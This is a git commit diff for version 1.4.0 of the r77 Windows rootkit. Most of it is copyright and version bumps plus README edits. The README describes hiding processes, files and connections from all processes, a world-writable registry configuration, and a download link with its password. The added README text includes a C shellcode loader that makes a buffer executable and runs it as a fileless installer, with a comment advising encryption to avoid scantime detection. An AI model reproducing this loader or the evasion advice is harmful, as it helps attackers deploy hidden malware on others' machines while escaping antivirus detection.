1.4.0

bytecode77 · bytecode77 · commit 0b3157ce7a56 · 2022-09-01T08:33:27.000+02:00
diff --git a/LICENSE.md b/LICENSE.md
@@ -1,4 +1,4 @@
-Copyright (c) 2021, bytecode77
+Copyright (c) 2022, bytecode77
 All rights reserved.
 
 Redistribution and use in source and binary forms, with or without
diff --git a/README.md b/README.md
@@ -11,8 +11,6 @@ r77 is a ring 3 Rootkit that hides following entities from all processes:
  - Services
  - TCP & UDP connections
 
-It is compatible with Windows 7 and Windows 10 in both x64 and x86 editions.
-
 ## Hiding by prefix
 
 All entities where the name starts with `"$77"` are hidden.
@@ -25,16 +23,38 @@ The dynamic configuration system allows to hide processes by **PID** and by **na
 
 ![](https://bytecode77.com/images/pages/r77-rootkit/config.png)
 
-The configuration is stored in `HKEY_LOCAL_MACHINE\SOFTWARE\$77config` and is writable by any process without elevated privileges. The DACL of this key is set to grant full access to any user.
+The configuration is located in `HKEY_LOCAL_MACHINE\SOFTWARE\$77config` and is writable by any process without elevated privileges. The DACL of this key is set to grant full access to any user.
 
 The `$77config` key is hidden when RegEdit is injected with the rootkit.
 
 ## Installer
 
-r77 is deployable using a single file `"Install.exe"`. It installs the r77 service that starts before the first user is logged on. This background process injects all currently running processes, as well as processes that spawn later. Two processes are needed to inject both 32-bit and 64-bit processes. Both processes are hidden by ID using the configuration system.
+r77 is deployable using a single file `"Install.exe"`. The installer persists r77 and injects all currently running processes.
 
 `Uninstall.exe` removes r77 from the system and gracefully detaches the rootkit from all processes.
 
+`Install.shellcode` is the shellcode equivalent of the installer. This way, the installer can be integrated without dropping `Install.exe`. It can simply be loaded into memory, casted to a function pointer, and executed:
+
+```
+int main()
+{
+	// 1. Load Install.shellcode from resources or from a BYTE[]
+	// Ideally, encrypt the file and decrypt it here to avoid scantime detection.
+	LPBYTE shellCode = ...
+
+	// 2. Make the shellcode RWX.
+	DWORD oldProtect;
+	VirtualProtect(shellCode, shellCodeSize, PAGE_EXECUTE_READWRITE, &oldProtect);
+
+	// 3. Cast the buffer to a function pointer and execute it.
+	((void(*)())shellCode)();
+
+	// This is the fileless equivalent to executing Install.exe.
+
+	return 0;
+}
+```
+
 ## Child process hooking
 
 When a process creates a child process, the new process is injected before it can run any of its own instructions. The function `NtResumeThread` is always called when a new process is created. Therefore, it's a suitable target to hook. Because a 32-bit process can spawn a 64-bit child process and vice versa, the r77 service provides a named pipe to handle child process injection requests.
@@ -103,7 +123,7 @@ Please read the [technical documentation](https://docs.bytecode77.com/r77-rootki
 
 ## Downloads
 
-[![](https://bytecode77.com/public/fileicons/zip.png) r77 Rootkit 1.3.0.zip](https://downloads.bytecode77.com/r77Rootkit%201.3.0.zip)
+[![](https://bytecode77.com/public/fileicons/zip.png) r77 Rootkit 1.4.0.zip](https://downloads.bytecode77.com/r77Rootkit%201.4.0.zip)
 (**ZIP Password:** bytecode77)<br />
 [![](https://bytecode77.com/public/fileicons/pdf.png) Technical Documentation](https://docs.bytecode77.com/r77-rootkit/Technical%20Documentation.pdf)
 
diff --git a/src/GlobalAssemblyInfo.cs b/src/GlobalAssemblyInfo.cs
@@ -1,8 +1,8 @@
 ﻿using System.Reflection;
 
-[assembly: AssemblyVersion("1.3.0")]
-[assembly: AssemblyFileVersion("1.3.0")]
-[assembly: AssemblyCopyright("© bytecode77, 2021.")]
+[assembly: AssemblyVersion("1.4.0")]
+[assembly: AssemblyFileVersion("1.4.0")]
+[assembly: AssemblyCopyright("© bytecode77, 2022.")]
 
 namespace Global
 {
diff --git a/vs/TestConsole/Views/AboutPopup.xaml b/vs/TestConsole/Views/AboutPopup.xaml
@@ -32,7 +32,7 @@
 				<StackPanel>
 					<Image Source="/TestConsole;component/Resources/AboutTitle.png" Stretch="UniformToFill" Width="320" HorizontalAlignment="Center" Margin="0,0,0,20" />
 					<Image Source="/TestConsole;component/Resources/AboutBanner.png" Stretch="None" HorizontalAlignment="Center" Margin="0,0,0,35" />
-					<TextBlock Text="© bytecode77, 2021." HorizontalAlignment="Center" Margin="0,0,0,35" />
+					<TextBlock Text="© bytecode77, 2022." HorizontalAlignment="Center" Margin="0,0,0,35" />
 					<Border BorderThickness="0,1,0,0" BorderBrush="#20ffffff" Margin="0,0,0,30" />
 					<DockPanel Margin="0,0,0,10">
 						<Image Source="/TestConsole;component/Resources/AboutWebsite16.png" Stretch="None" Margin="0,0,5,0" />

Original file line number	Diff line number	Diff line change
`@@ -1,4 +1,4 @@`
`1`		`-Copyright (c) 2021, bytecode77`
	`1`	`+Copyright (c) 2022, bytecode77`
`2`	`2`	`All rights reserved.`
`3`	`3`
`4`	`4`	`Redistribution and use in source and binary forms, with or without`